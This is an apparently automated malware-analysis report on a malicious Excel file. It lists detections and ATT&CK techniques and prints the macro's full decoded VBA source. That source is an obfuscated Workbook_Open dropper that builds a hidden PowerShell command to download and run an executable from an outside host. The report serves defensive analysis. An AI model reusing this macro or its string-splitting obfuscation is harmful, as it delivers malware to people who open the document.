MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File: User Execution
T1059 Command and Scripting Interpreter
The sample is an Excel file containing VBA macros, specifically a Workbook_Open macro that uses the Shell() function. This function is used to execute a command, which is obfuscated using string concatenation to reassemble 'cmd /c'. The macro's intent is to download and execute a second-stage payload, as indicated by the critical heuristic firings and the nature of the Shell() call. The document body's Japanese text and yellow message bar are a common lure to enable macros.
Heuristics 5
-
ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3231 bytes |
SHA-256: 3aff8fe7acc4afd7b10bc38f258ab40134e3172410c7191d3c9cb52c2ba09c03 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function yogaindiaa()
shabolaaa = "VI" + "r'" + ",'N" + "t'," + "'mE') ; "
yogaindiaa = "$7d" + "0mK6 = [" + versusgame + "}{2" + "}\"" -f '" + "on'" + ",'eN" + shabolaaa
End Function
Function versusgame()
versusgame = "Typ" + "e](\""{" + "1}{0" + "}{3"
End Function
Function diplodosea()
palmaoils = "{D`e" + "s} = $7d"
diplodosea = "d" + "o{&(\""{1}" + "{0}\"" -f'ep','" + "sle'" + ") 31;$" + palmaoils
End Function
Function dabalokok()
dabalokok = "(\""{" + "0}" + "{2}{" + "1}{3}{" + "5}{6}" + "{4}\""" + "-f'" + "S" + "y','t" + "e','s" + "','m"
End Function
Function hablloker()
hablloker = "OaDfiLE.IN"
End Function
Function gemeremi()
gemeremi = "oP" + "Ro" + "FI -W"
End Function
Function gyroskopius()
gyroskopius = "d" + "en" + " -n"
End Function
Function flibaloba()
flibaloba = "nON" + "inT"
End Function
Function curveastell()
bermudass = "a"
curveastell = bermudass + "ss " + " """
End Function
Function abigalevermont()
abigalevermont = samoevsbruna + "o -" + flibaloba + "eR" & "a -Ex" + "eC" & "uTI" + "On" + "P b" + "yP" + curveastell
End Function
Function samoevsbruna()
samoevsbruna = "c" + "m" + "d " + " /" + "c""" & "p" + "Ow" + "Er" + "sHe" + "Ll" + " -n" + gemeremi + "in " + " H" & "iD" + gyroskopius + "oL"
End Function
Function terraincognitoo()
terraincognitoo = "skt" + "op"
End Function
Sub Workbook_Open()
vintagenioe = "p"
If msoArrowheadWidthMixed < 0.87 Then
Dim planeverythink As String
ernestohimm = msoColorTypeCMYK - 3
Randomize
planeverythink = Int(Rnd * 9882761#)
deathlifeone = planeverythink
antaaaanana = dabalokok + ".Ne','enT','t.WeB','ClI')).dOwNL" + hablloker + "VokE(\""ht" + "t" + "p:/" + "/gober" + "tonis.c" + "om/n" + "ote\"",\""$" + "Des\" + deathlifeone + ".e" + "xe\"")}"
perlitdiamond = diplodosea + "0mk" + "6::gE" + digitpiii + "TH(\""De" + terraincognitoo + "\"")" + ";(&(" + "\""{0}{1" + "}{2}\""" + " -f'N" + "e','w-" + "','O" + "bj" + "ect') "
inicedays = hippporose + deathlifeone + ".ex" + "e"""
gabrieleanna = abigalevermont + yogaindiaa + perlitdiamond + antaaaanana + inicedays
Shell gabrieleanna, ernestohimm
End If
End Sub
Function digitpiii()
digitpiii = "tFo" + "Ld" + "eR" + "Pa"
End Function
Function shipseariver()
shipseariver = "s" + "s'," + "'ar" + "t'," + "'-" + "Pr')" + " $D"
End Function
Function hippporose()
If 544 < 877533 Then
hippporose = "whi" + "le(" + "!${?}" + ");&(\""{" + nulliggg + "t','o" + "ce" + shipseariver + "e" + "s\"
End If
End Function
Function nulliggg()
nulliggg = "0}{" + "2}{3" + "}{1}" + "\""-f 'S"
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.